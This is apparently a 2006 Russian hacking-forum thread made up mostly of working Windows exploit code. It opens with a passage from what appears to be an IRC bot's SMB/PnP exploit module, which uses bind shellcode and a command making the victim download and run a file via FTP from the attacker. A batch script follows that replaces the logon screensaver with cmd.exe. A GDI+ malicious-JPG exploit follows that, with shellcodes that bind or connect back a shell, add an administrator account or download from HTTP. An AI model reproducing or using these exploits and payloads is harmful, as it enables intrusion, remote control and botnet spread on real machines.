   "\xe6\x23\x62\x64\x7f\x9d\x37\x05\x71\x82\x77\x05\x46\xa1\xfb\xe7" 
   "\x71\x3e\xe9\xcb\x22\xa5\xfb\xe1\x46\x7c\xe1\x51\x98\x18\x0c\x35" 
   "\x4c\x9f\x06\xc8\xc9\x9d\xdd\x3e\xec\x58\x53\xc8\xcf\xa6\x57\x64" 
   "\x4a\xa6\x47\x64\x5a\xa6\xfb\xe7\x7f\x9d\x1a\x55\x7f\xa6\x8d\xd6" 
   "\x8c\x9d\xa0\x2d\x69\x32\x53\xc8\xcf\x9f\x14\x66\x4c\x0a\xd4\x5f" 
   "\xbd\x58\x2a\xde\x4e\x0a\xd2\x64\x4c\x0a\xd4\x5f\xfc\xbc\x82\x7e" 
   "\x4e\x0a\xd2\x67\x4d\xa1\x51\xc8\xc9\x66\x6c\xd0\x60\x33\x7d\x60" 
   "\xe6\x23\x51\xc8\xc9\x93\x6e\x53\x7f\x9d\x67\x5a\x90\x10\x6e\x67" 
   "\x40\xdc\xc8\xbe\xfe\x9f\x40\xbe\xfb\xc4\xc4\xc4\xb3\x0b\x46\x1a" 
   "\xe7\xb7\x28\xa4\x94\x8f\x3c\x9c\xb2\x5e\x6c\x45\xe7\x46\x12\xc8" 
   "\x6c\xb1\xfb\xe1\x42\xa2\x56\x66\x48\xa4\x6e\x36\x48\xa4\x51\x66" 
   "\xe6\x25\x6c\x9a\xc0\xf0\xca\x64\xe6\x23\x6e\xc8\xe6\xc2\xfb\xe7" 
   "\x92\xa2\xf8\xb4\xdd\x91\xfb\xe1\x4b\x0a\xd4\x5f\xf6\x3b\xe4\x57" 
   "\x4a\x0a\xd2\xc8\xc9\xf5\x04\x37"; 

#define SET_PORTBIND_PORT(buf, port) \ 
*(unsigned short *)(((buf)+186)) = (port) 

void convert_name(char *out, char *name) 
{ 
   unsigned long lenx; 

   lenx = strlen(name); 
   out += lenx * 2 - 1; 
   while (lenx--) { 
      *out-- = '\x00'; 
      *out-- = name[lenx]; 
   } 
} 

bool pnp_multi(int Offset, EXINFO exinfo) 
{ 
   struct sockaddr_in addr; 
   int len; 
   int sockfd; 
   unsigned short smblen; 
   unsigned short bindport; 
   char tmp[1024]; 
   char RPC_call[MAX_PATH]; 
   char packet[4096]; 
   char *ptr; 
   char recvbuf[4096]; 

   WSADATA wsa; 
   WSAStartup(MAKEWORD(2,0), &wsa); 

   if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) return FALSE; 

   addr.sin_family = AF_INET; 
   addr.sin_port = fhtons(445); 
   addr.sin_addr.s_addr = finet_addr(exinfo.ip); 
   memset(&(addr.sin_zero), '\0', 8); 

   if (fconnect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) return FALSE; 

   if (fsend(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) return FALSE; 

   len = frecv(sockfd, recvbuf, 4096, 0); 
   if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; 

   if (fsend(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) return FALSE; 

   len = frecv(sockfd, recvbuf, 4096, 0); 
   if (len <= 10) return FALSE; 

   if (fsend(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) return FALSE; 

   len = frecv(sockfd, recvbuf, 4096, 0); 
   if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; 

   ptr = packet; 
   memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1); 
   ptr += sizeof(SMB_TreeConnectAndX)-1; 

   sprintf(tmp, "\\\\%s\\IPC$", exinfo.ip); 
   convert_name(ptr, tmp); 
   smblen = strlen((const char*)tmp)*2; 
   ptr += smblen; 
   smblen += 9; 
   memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1); 

   memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1); 
   ptr += sizeof(SMB_TreeConnectAndX_)-1; 

   smblen = ptr-packet; 
   smblen -= 4; 
   memcpy(packet+3, &smblen, 1); 

   if (fsend(sockfd, packet, ptr-packet, 0) < 0) return FALSE; 

   len = frecv(sockfd, recvbuf, 4096, 0); 
   if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; 

   if (fsend(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) return FALSE; 

   len = frecv(sockfd, recvbuf, 4096, 0); 
   if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; 

   if (fsend(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) return FALSE; 

   len = frecv(sockfd, recvbuf, 4096, 0); 
   if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; 

   ptr = packet; 
   memset(packet, '\x90', sizeof(packet)); 

   memcpy(RPC_call, RPC_call_part1, sizeof(RPC_call_part1)-1); 

   if(Offset==0) 
      memcpy(RPC_call, offset_universal_SP4, sizeof(offset_universal_SP4)-1); 

   if(Offset==1) 
      memcpy(RPC_call, offset_SP0_SP4_eng, sizeof(offset_SP0_SP4_eng)-1); 

   if(Offset==2) 
      memcpy(RPC_call, offset_winXP_SP1, sizeof(offset_winXP_SP1)-1); 

   memcpy(RPC_call, RPC_call_part2, sizeof(RPC_call_part2)-1); 

   memcpy(ptr, RPC_call, sizeof(RPC_call)-1); 
   ptr += sizeof(RPC_call)-1; 

   bindport = (unsigned short)18989; 
   bindport ^= 0x0437; 
   SET_PORTBIND_PORT(bind_shellcode, fhtons(bindport)); 
   memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1); 

   memcpy(packet + 2196 - sizeof(RPC_call_end)-1 + 2, RPC_call_end, sizeof(RPC_call_end)-1); 

   if (fsend(sockfd, packet, 2196, 0) < 0) return FALSE; 

   frecv(sockfd, recvbuf, 4096, 0); 
   Sleep(300); 

   return (ConnectShell(exinfo, bindport)); 
} 

bool ConnectShell(EXINFO exinfo, int port) { 
   SOCKET sock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 
   if(sock == INVALID_SOCKET) return false; 

   SOCKADDR_IN sin; 
   memset(&sin, 0, sizeof(sin)); 
   sin.sin_family = AF_INET; 
   sin.sin_addr.s_addr = finet_addr(exinfo.ip); 
   sin.sin_port = fhtons((unsigned short)port); 

   if(fconnect(sock, (LPSOCKADDR)&sin, sizeof(sin)) == SOCKET_ERROR) return false; 

   char cmd_buff[400]; 
   char sendbuf[MAX_PATH]; 

   sprintf(cmd_buff, "echo open %s %d > o&echo user 1 1 >> o&echo get %s >> o&echo quit >> o&ftp -n -s:o&del /F /Q o&start %s&%s\r\n", GetIP(exinfo.sock),FTP_PORT, filename, filename, filename); 

   if(fsend(sock,(char*)cmd_buff, strlen(cmd_buff),0) == SOCKET_ERROR) return false; 

   fclosesocket(sock); 

   sprintf(sendbuf, "[PNP]: Exploiting IP: %s.", exinfo.ip); 
   if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice); 
   addlog(sendbuf); 

   return true; 
} 

bool PNP(EXINFO exinfo) 
{ 
   bool bOK=FALSE; 

   bOK = pnp_multi(0, exinfo); 
   if(bOK==FALSE) bOK = pnp_multi(1, exinfo); 
   if(bOK==FALSE) bOK = pnp_multi(2, exinfo); 

   if(bOK==TRUE) 
      return TRUE; 
   else 
      return FALSE; 
} 
#endif

Ŧ1LAN · 31.05.2006

Подмена скринсейвера в Microsoft Windows
Уязвимые системы:
Windows XP
Windows 2003 Server
(кстати что-то подобное было и в 2000 винде СП2 если не ошибаюсь)
Описание:
так как по умолчанию, в Windows XP и 2003 скринсейвер запущен с привилегями System, то злонамеренному пользователю(aka Хацкер) удасться подменить logon.scr на левый файл, нападающий(aka Хацкер) может получить доступ к целевой системе, выполнить произвольный код или запустить вредоносное ПО.
Эксплоит:

Код:

@echo off
rem ---------------------------------------------------------------------------
rem FileName:  DSSExploit.bat
rem Description:	This script replaces the default windows screensaver
rem  	with command prompt and configures the registry for
rem  	attack
rem Author:  Susam Pal
rem Date:  	19th May, 2006
rem ---------------------------------------------------------------------------

rem kill logon.scr if its running
tasklist | find /i "logon.scr"
if %errorlevel% == 1 goto replace
taskkill /f /im "logon.scr"

:replace
rem replace
rename %SystemRoot%\System32\logon.scr logon.scr.bak
copy %ComSpec% %SystemRoot%\System32\logon.scr

rem update the registry keys for default screen saver
set DSSKEY="HKEY_USERS\.DEFAULT\Control Panel\Desktop"
reg add %DSSKEY% /v ScreenSaveActive /t REG_SZ /f /d 1
reg add %DSSKEY% /v ScreenSaverIsSecure /t REG_SZ /f /d 0
reg add %DSSKEY% /v ScreenSaveTimeOut /t REG_SZ /f /d 60
reg add %DSSKEY% /v SCRNSAVE.EXE /t REG_SZ /f /d logon.scr

Решение:
вообще конечно косяк это... второй раз на оджни и теже грабли микрософт наступает, почти тоже самое было и с 2000 виндой...
ну вот... решать эту проблему будем сами...
Первый способ:
Вообще вырубить этот скринсейвер(нафига он нужен вообще)!
второй способ(Старый как мир):
Не запускать подозрительные файлы(free_porno.exe, web-money_hacker, etc) присланые чёрт знает от кого...
третий способ(самый надёжный):
Выключить компьютер и не включать пока микрософт не выпустит патч.
воть вроде всё...
ах да забыл.... всё что здесь написано исключительно для ознакомления!

ammok · 31.05.2006

Ŧ1LAN

так как по умолчанию, в Windows XP и 2003 скринсейвер запущен с привилегями System, то злонамеренному пользователю(aka Хацкер) удасться подменить logon.scr на левый файл, нападающий(aka Хацкер) может получить доступ к целевой системе, выполнить произвольный код или запустить вредоносное ПО.

Посмотрев батник, я понял что это проканает, только с правами админа, а если они есть то зачем это все нужно?

x_empty_dragon · 31.05.2006

так как по умолчанию, в Windows XP и 2003 скринсейвер запущен с привилегями System, то злонамеренному пользователю(aka Хацкер) удасться подменить logon.scr на левый файл, нападающий(aka Хацкер) может получить доступ к целевой системе, выполнить произвольный код или запустить вредоносное ПО.

слышал что на xp sp2 уже не пашет (

ZXroot · 31.05.2006

Привожу код эксплоита + реализация шеллкода под русские версии XP. Третий шеллкод - я изменил, что про админов.

Код:

//+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
// This is provided as proof-of-concept code only for educational
// purposes and testing by authorized individuals with permission to
// do so.
//
//                 .:[Sacred Desciples of Doom]:.
//
//  GDI+ buffer overrun Exploit, Modified by Crypto <crypto@xaker.ru> 
//                 Greets to FoToZ who found the bug
//               Exploit will build a malicious JPG File
//
// Note: The headers here are only sample headers taken from a .JPG file,
//       with the FF FE 00 01 inserted in header1.We can use a 2500 bytes
//       space for shellcode.
//
//Greets to my friends: Wyk,SSarpele,sAD_sMile, Pimpa, Sacred, to my doggy Kiki :)
//and to other Hackers from Republica Moldova.
//
// Tested on an unpatched WinXP SP1 Eng
//
// PS:I wass playing with this exploit couple of days ... when I whanted to post
// it, HighT1mes already made an exploit with the same functionality ...
// but with really not nice shellcodes, especialy the shellcode for adding an
// administrator ... but http_shellcode was nice :)
// you stay on #romhack , I stay on #moldhack heheh :) nick:Alladin`
//++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#include <direct.h>
#include <windows.h>
#include <winbase.h>
#include <winnls.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")

#define SET_PORTBIND_PORT(buf, port) *(unsigned short *)(((buf)+235+16)) = (port)
#define SET_CONNECTBACK_IP(buf, ip)     *(unsigned long *)(((buf)+221+16)) = (ip)
#define SET_CONNECTBACK_PORT(buf, port) *(unsigned short *)(((buf)+228+16)) = (port)



//++++++++++++++++++++++++++++++++++++++++++++++++++++++++
//pop up cmd.exe
char shellcode1[]=
"\x68"// push
"cmd "
"\x8B\xC4"// mov eax,esp
"\x50"// push eax
"\xB8\x44\x80\xC2\x77"// mov eax,77c28044h (address of system() on WinXP SP1)
"\xFF\xD0";// call eax


//bind cmd.exe on a [port] defined by user
unsigned char shellcode2[] =
"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"
"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"
"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"
"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"
"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"
"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"
"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"
"\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53"
"\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4"
"\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9"
"\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d"
"\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51"
"\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54"
"\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff"
"\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x22\x11\x89\xe0\x6a"
"\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff\x55"
"\x20\x89\xc7\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c"
"\x24\xac\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10"
"\x44\x66\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c"
"\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49"
"\x51\x51\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff"
"\xd0\x89\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3"
"\x6a\xff\xff\x36\xff\xd3\xff\x75\x00\x68\x7e\xd8\xe2\x73\xff\x55"
"\x04\x31\xdb\x53\xff\xd0"; 


//It will create a new user account with the username="ASP32.NET"
// and password of "ASP" and add it to the local group "Администраторы"
// Modified by ZXroot for using in XP SP 1: Russian Edition
char shellcode3[]=
"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45"
"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3"
"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74"
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59"
"\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68"
"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\xeb\x18\x53\x68\x98\xfe\x8a\x0e"
"\xff\xd6\xff\xd0\x53\x68\xef\xce\xe0\x60\xff\xd6\x6a\x00\xff\xd0"
"\xff\xd0\x6a\x00\xe8\xe1\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65"
"\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x41\x53\x50"
"\x33\x32\x2e\x4e\x45\x54\x20\x41\x53\x50\x20\x2f\x41\x44\x44\x20"
"\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75"
"\x70\x20\xC0\xE4\xEC\xE8\xED\xE8\xF1\xF2\xF0\xE0\xF2\xEE\xF0\xFB"
"\x20\x41\x53\x50\x33\x32\x2e\x4e\x45\x54\x20\x2f\x41\x44\x44\x00";


//connect back to a user defined [ip] and [port]
unsigned char shellcode4[] = 
"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"
"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"
"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"
"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"
"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"
"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"
"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"
"\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53"
"\x89\xe5\xe8\x1f\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4"
"\x19\x70\xe9\xec\xf9\xaa\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57"
"\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89"
"\xc3\x8d\x75\x14\x6a\x05\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59"
"\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x28\x31\xc0\x50"
"\x50\x50\x50\x40\x50\x40\x50\xff\x55\x24\x89\xc7\x68\x7f\x00\x00"
"\x01\x68\x02\x00\x22\x11\x89\xe1\x6a\x10\x51\x57\xff\x55\x20\x59"
"\x59\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c\x24\xac"
"\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10\x44\x66"
"\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c\x89\x7c"
"\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51"
"\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff\xd0\x89"
"\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3\x6a\xff"
"\xff\x36\xff\xd3\xff\x75\x00\x68\x7e\xd8\xe2\x73\xff\x55\x04\x31"
"\xdb\x53\xff\xd0";

//donwload from http
char shellcode5[]=
"\xEB\x0F\x58\x80\x30\x17\x40\x81\x38\x6D\x30\x30\x21\x75\xF4"
"\xEB\x05\xE8\xEC\xFF\xFF\xFF\xFE\x94\x16\x17\x17\x4A\x42\x26"
"\xCC\x73\x9C\x14\x57\x84\x9C\x54\xE8\x57\x62\xEE\x9C\x44\x14"
"\x71\x26\xC5\x71\xAF\x17\x07\x71\x96\x2D\x5A\x4D\x63\x10\x3E"
"\xD5\xFE\xE5\xE8\xE8\xE8\x9E\xC4\x9C\x6D\x2B\x16\xC0\x14\x48"
"\x6F\x9C\x5C\x0F\x9C\x64\x37\x9C\x6C\x33\x16\xC1\x16\xC0\xEB"
"\xBA\x16\xC7\x81\x90\xEA\x46\x26\xDE\x97\xD6\x18\xE4\xB1\x65"
"\x1D\x81\x4E\x90\xEA\x63\x05\x50\x50\xF5\xF1\xA9\x18\x17\x17"
"\x17\x3E\xD9\x3E\xE0\xFE\xFF\xE8\xE8\xE8\x26\xD7\x71\x9C\x10"
"\xD6\xF7\x15\x9C\x64\x0B\x16\xC1\x16\xD1\xBA\x16\xC7\x9E\xD1"
"\x9E\xC0\x4A\x9A\x92\xB7\x17\x17\x17\x57\x97\x2F\x16\x62\xED"
"\xD1\x17\x17\x9A\x92\x0B\x17\x17\x17\x47\x40\xE8\xC1\x7F\x13"
"\x17\x17\x17\x7F\x17\x07\x17\x17\x7F\x68\x81\x8F\x17\x7F\x17"
"\x17\x17\x17\xE8\xC7\x9E\x92\x9A\x17\x17\x17\x9A\x92\x18\x17"
"\x17\x17\x47\x40\xE8\xC1\x40\x9A\x9A\x42\x17\x17\x17\x46\xE8"
"\xC7\x9E\xD0\x9A\x92\x4A\x17\x17\x17\x47\x40\xE8\xC1\x26\xDE"
"\x46\x46\x46\x46\x46\xE8\xC7\x9E\xD4\x9A\x92\x7C\x17\x17\x17"
"\x47\x40\xE8\xC1\x26\xDE\x46\x46\x46\x46\x9A\x82\xB6\x17\x17"
"\x17\x45\x44\xE8\xC7\x9E\xD4\x9A\x92\x6B\x17\x17\x17\x47\x40"
"\xE8\xC1\x9A\x9A\x86\x17\x17\x17\x46\x7F\x68\x81\x8F\x17\xE8"
"\xA2\x9A\x17\x17\x17\x44\xE8\xC7\x48\x9A\x92\x3E\x17\x17\x17"
"\x47\x40\xE8\xC1\x7F\x17\x17\x17\x17\x9A\x8A\x82\x17\x17\x17"
"\x44\xE8\xC7\x9E\xD4\x9A\x92\x26\x17\x17\x17\x47\x40\xE8\xC1"
"\xE8\xA2\x86\x17\x17\x17\xE8\xA2\x9A\x17\x17\x17\x44\xE8\xC7"
"\x9A\x92\x2E\x17\x17\x17\x47\x40\xE8\xC1\x44\xE8\xC7\x9A\x92"
"\x56\x17\x17\x17\x47\x40\xE8\xC1\x7F\x12\x17\x17\x17\x9A\x9A"
"\x82\x17\x17\x17\x46\xE8\xC7\x9A\x92\x5E\x17\x17\x17\x47\x40"
"\xE8\xC1\x7F\x17\x17\x17\x17\xE8\xC7\xFF\x6F\xE9\xE8\xE8\x50"
"\x72\x63\x47\x65\x78\x74\x56\x73\x73\x65\x72\x64\x64\x17\x5B"
"\x78\x76\x73\x5B\x7E\x75\x65\x76\x65\x6E\x56\x17\x41\x7E\x65"
"\x63\x62\x76\x7B\x56\x7B\x7B\x78\x74\x17\x48\x7B\x74\x65\x72"
"\x76\x63\x17\x48\x7B\x60\x65\x7E\x63\x72\x17\x48\x7B\x74\x7B"
"\x78\x64\x72\x17\x40\x7E\x79\x52\x6F\x72\x74\x17\x52\x6F\x7E"
"\x63\x47\x65\x78\x74\x72\x64\x64\x17\x40\x7E\x79\x5E\x79\x72"
"\x63\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x56"
"\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x42\x65"
"\x7B\x56\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x45\x72\x76\x73"
"\x51\x7E\x7B\x72\x17\x17\x17\x17\x17\x17\x17\x17\x17\x7A\x27"
"\x27\x39\x72\x6F\x72\x17"
"m00!";



//add other shellcodes that you need here :)
//+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

char header1[]=
"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64"
"\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00"
"\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65"
"\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19"
"\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26"
"\x2E\x3E\x35\x35\x35\x35\x35\x3E";

char setNOPs1[]=
"\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
"\x00\x05\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8";

char setNOPs2[]=
"\x3E\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
"\x2F\x00\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8";

char header2[]=
"\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x01\x15\x19\x19"
"\x20\x1C\x20\x26\x18\x18\x26\x36\x26\x20\x26\x36\x44\x36\x2B\x2B"
"\x36\x44\x44\x44\x42\x35\x42\x44\x44\x44\x44\x44\x44\x44\x44\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\xFF\xC0\x00"
"\x11\x08\x03\x59\x02\x2B\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01"
"\xFF\xC4\x00\xA2\x00\x00\x02\x03\x01\x01\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x03\x04\x01\x02\x05\x00\x06\x01\x01\x01\x01"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02"
"\x03\x10\x00\x02\x01\x02\x04\x05\x02\x03\x06\x04\x05\x02\x06\x01"
"\x05\x01\x01\x02\x03\x00\x11\x21\x31\x12\x04\x41\x51\x22\x13\x05"
"\x61\x32\x71\x81\x42\x91\xA1\xC1\x52\x23\x14\xB1\xD1\x62\x15\xF0"
"\xE1\x72\x33\x06\x82\x24\xF1\x92\x43\x53\x34\x16\xA2\xD2\x63\x83"
"\x44\x54\x25\x11\x00\x02\x01\x03\x02\x04\x03\x08\x03\x00\x02\x03"
"\x01\x00\x00\x00\x00\x01\x11\x21\x31\x02\x41\x12\xF0\x51\x61\x71"
"\x81\x91\xA1\xB1\xD1\xE1\xF1\x22\x32\x42\x52\xC1\x62\x13\x72\x92"
"\xD2\x03\x23\x82\xFF\xDA\x00\x0C\x03\x01\x00\x02\x11\x03\x11\x00"
"\x3F\x00\x0F\x90\xFF\x00\xBC\xDA\xB3\x36\x12\xC3\xD4\xAD\xC6\xDC"
"\x45\x2F\xB2\x97\xB8\x9D\xCB\x63\xFD\x26\xD4\xC6\xD7\x70\xA4\x19"
"\x24\x50\xCA\x46\x2B\xFC\xEB\x3B\xC7\xC9\xA5\x4A\x8F\x69\x26\xDF"
"\x6D\x72\x4A\x9E\x27\x6B\x3E\xE6\x92\x86\x24\x85\x04\xDB\xED\xA9"
"\x64\x8E\x6B\x63\x67\x19\x1A\xA5\xE7\xB8\x28\x3D\x09\xAB\x5D\x5F"
"\x16\xF7\x8C\xED\x49\x4C\xF5\x01\xE6\xE5\xD5\x1C\x49\xAB\x10\x71"
"\xA6\x36\x9B\x93\x24\x61\x00\x0F\x61\xEC\x34\xA7\x9C\x23\xF4\x96"
"\xC6\xE6\xAF\xB7\x80\x76\xEF\x93\xF0\xAA\x28\x8A\x6B\xE0\x18\xC0"
"\xA4\x9B\x7E\x90\x39\x03\xC2\x90\xDC\x43\x31\x91\x62\x91\x86\x23"
"\x35\x35\xA2\x80\x4D\xFA\x72\x31\x07\x9D\x03\x70\xA8\x93\x24\x4F"
"\x89\x51\x83\x5E\xA4\x2E\x7A\xC0\x7D\xA9\x8A\x10\x61\x64\x07\xFA"
"\x88\xC6\x89\x26\xDA\x0F\x20\xBD\xB9\x16\xD2\xA8\xE8\x91\x3F\x1A"
"\xE2\xBA\xF0\xBE\x74\xAB\x1D\xC4\x44\x15\x1A\x8A\x9C\xC7\x2A\x6B"
"\xA3\x33\xB7\x1E\x88\x47\x69\xA9\x64\x68\x26\xC1\x97\x0B\xD6\x86"
"\x8B\x1B\x29\xC6\x87\xE4\xC7\xFD\xCC\x53\x11\xA5\x9C\x62\x6A\xE5"
"\x40\x37\x61\x89\xF6\xB2\x9C\x2A\x7C\xFD\x05\x6A\x30\x5F\x52\x02"
"\xEB\x72\xBF\x7D\x74\x4C\x23\xB9\x8F\xD8\x78\x67\x54\x59\x64\x47"
"\xC5\x75\x21\x18\xD5\xE3\x58\xE1\x72\x63\xBF\x6D\xBD\xCB\xCA\x82"
"\x65\xE7\xDB\x09\x54\x4F\x0D\x95\x86\x76\xE3\xF2\xA0\x48\x82\x55"
"\xD7\xA6\xCE\xA7\xAA\xDC\x6A\xF1\xA9\x8E\xE0\x35\xC1\xCA\xA1\xD4"
"\x93\xD2\xD6\x39\x95\x3C\x6B\x46\x60\xAC\xC1\x3B\x60\xC9\x70\x84"
"\x8E\xA1\x9A\x9A\x20\x01\x94\xCA\x08\x91\x53\xDC\x01\xB1\xB5\x12"
"\x37\x11\xC6\xC1\xAC\xF1\x11\xD4\x9C\x6B\x3E\x69\x76\xF0\x1D\x7B"
"\x52\x6D\xC9\xA8\x66\x94\xBB\x79\x8F\x7E\xDE\x17\xFD\x4D\xAB\x1E"
"\x76\x7A\xA3\x2B\xE2\x50\x06\xB7\x2C\xEB\x2A\x49\xC9\xEA\x4E\x9B"
"\xE7\xCA\xAF\x1E\xEC\x23\xDC\x8B\xE1\x6B\x5F\x1A\x9B\xE8\x49\x2E"
"\x63\xE5\x03\x32\xCD\x19\xB8\x23\x10\x78\x1F\x85\x5C\x15\x8C\x97"
"\x84\x9B\xDB\x15\x35\x9F\x16\xE0\x1E\x86\xB9\x8F\x97\x11\x4E\xDA"
"\x35\x02\x45\x25\x93\xF8\x55\x24\x17\xB9\x1B\xF5\xC8\x07\xA9\xE2"
